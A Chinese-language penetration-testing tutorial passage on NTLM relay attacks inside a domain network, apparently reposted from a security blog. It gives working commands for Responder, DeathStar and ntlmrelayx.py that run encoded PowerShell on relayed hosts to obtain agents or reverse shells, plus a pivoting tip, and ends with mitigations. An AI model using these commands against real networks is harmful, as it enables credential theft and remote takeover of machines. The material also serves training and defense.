内网渗透-net-NTLM hash的攻击( 二 )


launcher powershell DeathStar,生成powershell代码

内网渗透-net-NTLM hash的攻击

文章插图
 
4、启动Responder
sudo python Responder.py -I eht0 -r -d –v
Deathstar会自动寻找域控制器,及活跃用户等目录进行中继转发 。
5、这条命令是对中继成功的机器,自动执行powershell,获取agent,powershell脚本放在引号中 。
sudo ntlmrelayx.py -t 192.168.191.189 -c ‘powershell -noP -sta -w 1 -enc [powershell code]’
内网渗透-net-NTLM hash的攻击

文章插图
 
ntlmrelayx.py支持-tf(例如target.txt),把目标导入利用中继批量转发攻击 。
6、net use 192.168.191.190a
内网渗透-net-NTLM hash的攻击

文章插图
 

内网渗透-net-NTLM hash的攻击

文章插图
 
可以看到对每台PC进行了转发测试,若成功则反弹shell 。
这个工具感觉没有想象中的强大,前面几分钟都在攻击我的kali攻击机,然后开始对域控进行中继,在整个网段探测存活,再对存活主机进行中继转发.
总结:
【内网渗透-net-NTLM hash的攻击】如果我们的msf在自己内网怎么办,目标内网肯定无法直接转发到我们的Responder,可以通过msf劫持445端口到自己本地,设置一个远程监听端口(auxiliary/scanner/smb/smb_login),用来接收smb的数据,在设置一个meterpreter反向转发端口(portfwdadd) 。
防御:
所有攻击都滥用了 NLTM 身份验证协议,因此唯一完整的解决方案是完全禁用 NTLM 并切换到 Kerberos 。操作系统若不支持 Kerberos 身份验证,无法禁用,启用 SMB 签名,启用 LDAP 签名等来缓解 。
原文链接:https://www.anquanke.com/post/id/200649




推荐阅读